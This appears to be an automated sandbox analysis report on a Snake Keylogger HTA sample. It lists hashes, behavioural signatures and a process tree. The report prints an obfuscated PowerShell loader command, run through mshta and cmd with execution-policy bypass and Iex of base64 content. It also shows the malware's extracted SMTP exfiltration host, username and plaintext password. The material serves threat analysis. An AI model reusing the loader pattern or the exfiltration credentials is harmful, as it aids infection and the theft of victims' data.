Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
submitted
28-09-2024 01:09
Static task
static1
Behavioral task
behavioral1
Sample
1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64.hta
Resource
win10v2004-20240802-en
General
-
Target
1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64.hta
-
Size
115KB
-
MD5
17116a0f43508549998ef6618154d77a
-
SHA1
e71af8b0489263e476521a5fd6e22e5511369c4d
-
SHA256
1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64
-
SHA512
a6824f19100e0fd4c996ab8db64875fb1c0c0e4d045792793b45ad1e93cb358c6746289209d8d1f4634c6ebed9ade9e43a5b3407856780e7e60954efc249e9d9
-
SSDEEP
96:Ea+M7wmf6PCZ60NUrnPmeobQk9B6/A6I6L1j+Z668AT:Ea+Qwmf6PCZ6kUTWfz6Y6dKZ6+T
Malware Config
Extracted
snakekeylogger
Protocol: smtp
Host: mail.teilecar.com
Port: 587
Username: [email protected]
Password: Manta924porsche=911
Email To: [email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule
behavioral1/memory/1140-29-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger
behavioral1/memory/1140-30-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger
behavioral1/memory/1140-31-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2496 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2496 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2156 dllhost.exe -
Loads dropped DLL 6 IoCs
pid Process
2496 powershell.exe
1484 WerFault.exe
1484 WerFault.exe
1484 WerFault.exe
1484 WerFault.exe
1484 WerFault.exe
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000a000000015689-21.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2156 set thread context of 1140 2156 dllhost.exe 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1484 2156 WerFault.exe 36 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe
Modifies Internet Explorer settings 1 IoCs
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process
2496 powershell.exe
2496 powershell.exe
2496 powershell.exe
1140 RegSvcs.exe
1140 RegSvcs.exe
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2156 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process
Token: SeDebugPrivilege 2496 powershell.exe
Token: SeDebugPrivilege 1140 RegSvcs.exe
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process
2156 dllhost.exe
2156 dllhost.exe
2156 dllhost.exe
Suspicious use of SendNotifyMessage 3 IoCs
pid Process
2156 dllhost.exe
2156 dllhost.exe
2156 dllhost.exe
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target
PID 2524 wrote to memory of 2488 2524 mshta.exe 30
PID 2524 wrote to memory of 2488 2524 mshta.exe 30
PID 2524 wrote to memory of 2488 2524 mshta.exe 30
PID 2524 wrote to memory of 2488 2524 mshta.exe 30
PID 2488 wrote to memory of 2496 2488 cmd.exe 32
PID 2488 wrote to memory of 2496 2488 cmd.exe 32
PID 2488 wrote to memory of 2496 2488 cmd.exe 32
PID 2488 wrote to memory of 2496 2488 cmd.exe 32
PID 2496 wrote to memory of 2800 2496 powershell.exe 33
PID 2496 wrote to memory of 2800 2496 powershell.exe 33
PID 2496 wrote to memory of 2800 2496 powershell.exe 33
PID 2496 wrote to memory of 2800 2496 powershell.exe 33
PID 2800 wrote to memory of 3016 2800 csc.exe 34
PID 2800 wrote to memory of 3016 2800 csc.exe 34
PID 2800 wrote to memory of 3016 2800 csc.exe 34
PID 2800 wrote to memory of 3016 2800 csc.exe 34
PID 2496 wrote to memory of 2156 2496 powershell.exe 36
PID 2496 wrote to memory of 2156 2496 powershell.exe 36
PID 2496 wrote to memory of 2156 2496 powershell.exe 36
PID 2496 wrote to memory of 2156 2496 powershell.exe 36
PID 2156 wrote to memory of 1140 2156 dllhost.exe 37
PID 2156 wrote to memory of 1140 2156 dllhost.exe 37
PID 2156 wrote to memory of 1140 2156 dllhost.exe 37
PID 2156 wrote to memory of 1140 2156 dllhost.exe 37
PID 2156 wrote to memory of 1140 2156 dllhost.exe 37
PID 2156 wrote to memory of 1140 2156 dllhost.exe 37
PID 2156 wrote to memory of 1140 2156 dllhost.exe 37
PID 2156 wrote to memory of 1140 2156 dllhost.exe 37
PID 2156 wrote to memory of 1484 2156 dllhost.exe 38
PID 2156 wrote to memory of 1484 2156 dllhost.exe 38
PID 2156 wrote to memory of 1484 2156 dllhost.exe 38
PID 2156 wrote to memory of 1484 2156 dllhost.exe 38
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c POwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'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'+[CHAR]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'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'+[CHAR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xlbizkac.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9F1E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9F1D.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:3016
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1140
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 4005⤵
- Loads dropped DLL
- Program crash
PID:1484
Network
MITRE ATT&CK Enterprise v15
Downloads